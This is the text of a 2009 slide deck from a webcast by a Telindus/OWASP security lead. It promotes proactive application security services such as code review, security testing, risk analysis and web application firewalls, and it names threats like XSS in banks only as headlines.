Application Security Services A proactive approach

1
Application Security ServicesA pro-active
approach

• Webcast

Sebastien Deleersnyder
16 November 2009
2
Who Am I?

• 5 years developer experience
• 8 years information security experience
• Lead application security _at_ Telindus, Belgacom
  ICT
• Belgian OWASP chapter founder
• OWASP board member
• www.owasp.org

3
Web application (in)security
4
Hacktivism
5
Hacking for Dollar

• Online Extortion
• Identity theft
• Steal credit cards
• Bot-net pharming
• Sell phishing tools

Source www.shadowserver.org Sep 08
6
XSS in 7 major Dutch online banks (?o?ald)
Postbank ABN AMRO SNS bank Fortis banking
Delta Lloyd banking Spaarbeleg banking Insinger
de Beaufort banking
Source 0x000000.com
7
Problem illustration
Your security perimeter has huge holes at the
application layer
Custom Developed Application Code
Databases
Legacy Systems
Web Services
Directories
Human Resrcs
Billing
Application Layer
APPLICATIONATTACK
App Server
Web Server
Hardened OS
Network Layer
Firewall
Firewall
Firewall, SSL, IDS, hardening do not stop or
detect application layer attacks
8
Making it harder
complexity
spaghetticode
9
Making it even more harder
no application securityawareness /training
need for bells and whistles
10
Application Security

• Combination of services and technology to
  protect critical business applications from
  external threats.

Application Value
Risk
11
Pro-active action!

• 360 approach for secure applicationsend-2-end
  protection

WAF/XML firewalls
security testing
Security code review
architectual risk analysis
field
plan
build
test
policy awareness training
12
People
13
Architectural Risk Analysis
14
Source Code Security Review
15
Application Security Testing
16
Web Application / XML Firewall
17
Pro-active Application Security
Streamline
Analyse

• Embed good practices
• Tune metrics
• Report

• Application security maturity
• Risk profile
• Set objectives

360 Protection
Implement
Assess

• Application security controls
• Quick wins
• 80/20

• Process metrics
• Application defects
• People feedback

18
References

• Organisations where applications are increasingly
  important for the business processes.
• Examples
• Finance (online banking, online insurance
  brokers)
• Government (e-government, e-forms)
• Industry (retail, b2b chains, online shops)

19
Telindus Services

• Telindus experts provide application security
  services
• 360 Consultancy
• Source code review
• Security Testing
• Telindus delivers 360 solutions with technology
  partners
• Web application firewalls
• XML integration/security gateways
• Security scanning tools (source code /
  production)

20
Stay ahead
Type here level of Sensitivity "Unrestricted",
Internal Use Only" or "Confidential"
16 November 2009
Slide 20